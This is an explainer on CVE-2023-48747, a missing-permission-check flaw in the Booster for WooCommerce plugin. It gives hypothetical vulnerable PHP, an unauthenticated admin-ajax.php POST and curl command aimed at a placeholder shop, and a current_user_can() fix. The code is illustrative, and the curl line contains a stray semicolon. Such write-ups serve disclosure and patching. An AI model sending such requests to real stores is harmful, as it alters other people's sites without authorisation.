CVE-2023-48747 - Exploiting Improper Authentication in Booster for WooCommerce (Versions up to 7.1.2)

In late 2023, a critical vulnerability was discovered in the popular WordPress plugin Booster for WooCommerce, tracked as CVE-2023-48747. This vulnerability revolves around improper authentication, allowing attackers to access sensitive functions in the plugin that are not properly restricted by Access Control Lists (ACLs). In this article, we will break down how the vulnerability works, why it’s dangerous, and walk through a simple exploit example. All information is written in straightforward American English for easy understanding.

What is Booster for WooCommerce?

Booster for WooCommerce is a hugely popular plugin that extends WooCommerce's features. It’s used by hundreds of thousands of online shops to add custom carts, pricing, shipping options, and more.

Vulnerability Overview

CVE-2023-48747 is an Improper Authentication vulnerability. Due to the plugin’s failure to check user permissions properly, unauthorized visitors can access and perform functions meant only for admins or privileged users. More precisely, the plugin exposes some AJAX actions and REST endpoints without checking if the user is allowed to use them.

Type: Access control (Improper authentication, Functionality not properly constrained by ACLs)

- CVE page: https://nvd.nist.gov/vuln/detail/CVE-2023-48747
- Original advisory: Patchstack Advisory

The Weak Spot

The plugin registers several AJAX actions for backend features, assuming only admins or shop managers will ever send the requests. However, it neglects to use the WordPress function current_user_can() to check user rights on some endpoints.

For example, let’s look at a hypothetical plugin AJAX registration based on examination of similar vulnerabilities:

add_action( 'wp_ajax_booster_admin_action', 'booster_admin_action_callback' );
// The following allows even non-logged-in users access:
add_action( 'wp_ajax_nopriv_booster_admin_action', 'booster_admin_action_callback' );

function booster_admin_action_callback() {
    // Should check permissions here, but doesn't:
    // if ( ! current_user_can( 'manage_woocommerce' ) ) { wp_die(); }

    // Sensitive action performed here, e.g. change plugin settings
}

Notice the lack of a permission check? This code would allow anyone to run potentially dangerous functions, not just admins or privileged shop employees.

How It Gets Exploited

1. Identify the Endpoints: An attacker looks through the plugin code and finds AJAX or REST endpoints callable by anyone (including non-logged-in users).
2. Send Crafted Requests: Using tools like curl or a browser, the attacker sends specifically crafted HTTP POST or GET requests to those endpoints.
3. Change Settings or Exfiltrate Data: The attacker can turn on/off features, extract sensitive shop data, or maybe even inject their own malicious settings.

Step-by-Step Exploit Example

Suppose the AJAX action booster_admin_action lets you change shop display settings.

1. Find the endpoint

POST /wp-admin/admin-ajax.php?action=booster_admin_action HTTP/1.1
Host: vulnerable-shop.com
Content-Type: application/x-www-form-urlencoded

new_setting=value

Using curl

curl -X POST "https://vulnerable-shop.com/wp-admin/admin-ajax.php"; \
-d "action=booster_admin_action&new_setting=some_value"

No cookie or authentication needed. If the vulnerability is present and not patched, the plugin will wrongly accept and process the request.

Let’s look at a more concrete pseudocode for a setting change

// Vulnerable in versions <= 7.1.2
if ( isset( $_POST['booster_feature'] ) ) {
    update_option( 'booster_feature_option', sanitize_text_field( $_POST['booster_feature'] ) );
}

Because there’s no permission check, a remote attacker can toggle features at will by POSTing to /wp-admin/admin-ajax.php.

Example of proper fix in the code

function booster_admin_action_callback() {
    // Only allow admins!
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( 'You do not have permission to perform this action.' );
    }

    // ... rest of the logic
}

Original References

- NIST NVD: CVE-2023-48747
- Patchstack Advisory – Booster for WooCommerce
- Booster for WooCommerce plugin page

Final Thoughts

Improper authentication bugs like CVE-2023-48747 are easy for attackers to exploit and give them direct access to your site’s sensitive WooCommerce features. Always keep plugins updated and regularly review any exposed endpoints for missing permission checks. If you run Booster for WooCommerce, upgrade now and audit your shop’s configuration.

Timeline

Published on: 06/04/2024 11:15:50 UTC
Last modified on: 06/05/2024 13:53:07 UTC